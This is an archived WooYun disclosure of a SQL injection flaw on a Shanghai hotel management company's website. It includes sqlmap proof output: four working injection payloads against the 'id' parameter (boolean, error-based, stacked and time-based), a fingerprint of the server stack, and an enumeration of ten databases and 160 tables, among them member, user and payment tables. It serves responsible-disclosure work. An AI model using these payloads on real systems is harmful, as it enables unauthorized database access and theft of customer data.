当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163626

漏洞标题:上海泰欧酒店管理有限公司sql注入

相关厂商:上海泰欧酒店管理有限公司

漏洞作者: 0101010101010101010

提交时间:2015-12-24 20:10

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

Rt

详细说明:

http://**.**.**.**/Web/HotelMain.aspx?content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681') AND 5
747=5747 AND ('Wybo'='Wybo
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681') AND 5
295=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT
(CASE WHEN (5295=5295) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CH
AR(120)+CHAR(118)+CHAR(113))) AND ('tFtm'='tFtm
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681');WAITF
OR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: content=HotelDetail&id=27922EA0-53EF-40E2-A832-92ACE1F59681') WAITF
OR DELAY '0:0:5'--
---
[18:58:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[18:58:12] [INFO] fetching database names
[18:58:12] [INFO] the SQL query used returns 10 entries
[18:58:12] [INFO] resumed: master
[18:58:12] [INFO] resumed: model
[18:58:12] [INFO] resumed: msdb
[18:58:12] [INFO] resumed: Northwind
[18:58:12] [INFO] resumed: paragateweb
[18:58:12] [INFO] resumed: pubs
[18:58:12] [INFO] resumed: tempdb
[18:58:12] [INFO] resumed: temp-trac
[18:58:12] [INFO] resumed: to-mh
[18:58:12] [INFO] resumed: trac-china
available databases [10]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] paragateweb
[*] pubs
[*] temp-trac
[*] tempdb
[*] to-mh
[*] trac-china
Database: to-mh
[160 tables]
+----------------------------------------+
| Alliance |
| AnaTemp |
| Annual |
| Beneficiary |
| CashAccount |
| CityList |
| Club |
| Configuration |
| Cost |
| CountryList |
| Coupons |
| CouponsDetail |
| Hotel |
| HotelRoom |
| IncomeType |
| InterestSort |
| InterestSortDetail |
| LodgingPointAccount |
| LodgingPointDetail |
| LodgingPointPatch |
| LogInfo |
| LogInfoBackup |
| Member |
| MemberSBLog |
| Menu |
| Message |
| Partment |
| PassWordSeek |
| PointAccount |
| PointDetail |
| PointPatch |
| PointType |
| Recipient |
| RegistInfo |
| Reservation |
| ReservationNumber |
| Retailer |
| RightInfo |
| RightInfo_MMW |
| RoomDetail |
| RoomPointInfo |
| RoomSort |
| Sales |
| SalesControl |
| SeasonSort |
| UserInfo |
| UserInfo_MMW |
| UserRight |
| UserRight_MMW |
| WEB_CT_Enjoy |
| WEB_CT_EnjoyPhoto |
| WEB_CT_EnjoyPhoto_EN |
| WEB_CT_Enjoy_EN |
| WEB_CT_Hire |
| WEB_CT_Hire_EN |
| WEB_CT_History |
| WEB_CT_HistoryPhoto |
| WEB_CT_Hotel |
| WEB_CT_HotelPhoto |
| WEB_CT_HotelPhoto_EN |
| WEB_CT_HotelRoom |
| WEB_CT_HotelRoom_EN |
| WEB_CT_HotelSymbol |
| WEB_CT_HotelSymbol_EN |
| WEB_CT_Hotel_EN |
| WEB_CT_LandscapePhotoList |
| WEB_CT_LandscapePhotoList_EN |
| WEB_CT_Lease |
| WEB_CT_Lease_EN |
| WEB_CT_Letter |
| WEB_CT_LetterPhoto |
| WEB_CT_LetterPhoto_EN |
| WEB_CT_Letter_EN |
| WEB_CT_Links |
| WEB_CT_Links_EN |
| WEB_CT_MainPage |
| WEB_CT_MainPage_EN |
| WEB_CT_Message |
| WEB_CT_Message_EN |
| WEB_CT_News |
| WEB_CT_NewsPhoto |
| WEB_CT_NewsPhoto_EN |
| WEB_CT_News_EN |
| WEB_CT_ReosrtShowplacePhoto |
| WEB_CT_ReosrtShowplacePhoto_EN |
| WEB_CT_Resort |
| WEB_CT_ResortShowPlace |
| WEB_CT_ResortShowPlace_EN |
| WEB_CT_Resort_EN |
| WEB_CT_RoomSort |
| WEB_CT_RoomSort1 |
| WEB_CT_RoomSort_EN |
| WEB_CT_SaleSupport |
| WEB_CT_SaleSupportPhoto |
| WEB_CT_Tip |
| WEB_CT_Tip_EN |
| WEB_CT_Tips |
| WEB_CT_TipsPhoto |
| WEB_CT_TravelRoutes |
| WEB_CT_TravelRoutes_EN |
| WEB_CT_Vacation |
| WEB_CT_VacationAppend |
| WEB_CT_VacationAppend_EN |
| WEB_CT_Vacation_EN |
| WEB_SC_ApplyBeneLease |
| WEB_SC_ApplyBeneLease_EN |
| WEB_SC_ApplyEnterForFilmPrj |
| WEB_SC_ApplyMemberInfoChange |
| WEB_SC_ApplyMemberInfoChange_EN |
| WEB_SC_ApplyRSVOpt |
| WEB_SC_ApplyRSVState |
| WEB_SC_ApplyReservation |
| WEB_SC_ApplyReservation_EN |
| WEB_SC_ApplyVacation |
| WEB_SC_ApplyVacation_EN |
| WEB_SC_Comment |
| WEB_SC_Comment_EN |
| WEB_SC_FirstLogin |
| WEB_SC_FirstLogin_EN |
| WEB_SC_HotelServiceQuestionnaire |
| WEB_SC_HotelServiceQuestionnaire_EN |
| WEB_SC_QuestionnaireFavoriteMagItemUse |
| WEB_SC_QuestionnairePointUse |
| WEB_SYS_Configuration |
| WEB_SYS_Configuration_EN |
| WEB_SYS_Continent |
| WEB_SYS_Continent_EN |
| WEB_SYS_Country |
| WEB_SYS_Country_EN |
| WEB_SYS_DealType |
| WEB_SYS_District |
| WEB_SYS_District_EN |
| WEB_SYS_LogError |
| WEB_SYS_LogError_EN |
| WEB_SYS_LogOnlinePayment |
| WEB_SYS_MailLog |
| WEB_SYS_MailLog_EN |
| WEB_SYS_MenuDown |
| WEB_SYS_MenuDown_EN |
| WEB_SYS_MenuTop |
| WEB_SYS_MenuTop_EN |
| WEB_SYS_MenuWebManager |
| WEB_SYS_MenuWebManager_EN |
| WEB_SYS_RightInfo |
| WEB_SYS_RightInfo_EN |
| WEB_SYS_Symbol |
| WEB_SYS_UserInfo |
| WEB_SYS_UserInfo_EN |
| WEB_SYS_UserRight |
| WEB_SYS_UserRight_EN |
| WEB_SYS_WorkSpace |
| WEB_SYS_WorkSpace_EN |
| Web_CT_Noontea |
| Web_CT_QandA |
| WorkSpace |
| to-mh.dst2q |
| to-mh.tempTable184 |
| dtproperties |
| sysconstraints |
| syssegments |
+----------------------------------------+

修复方案:

版权声明:转载请注明来源 0101010101010101010@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-28 18:55

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无


漏洞评价:

评价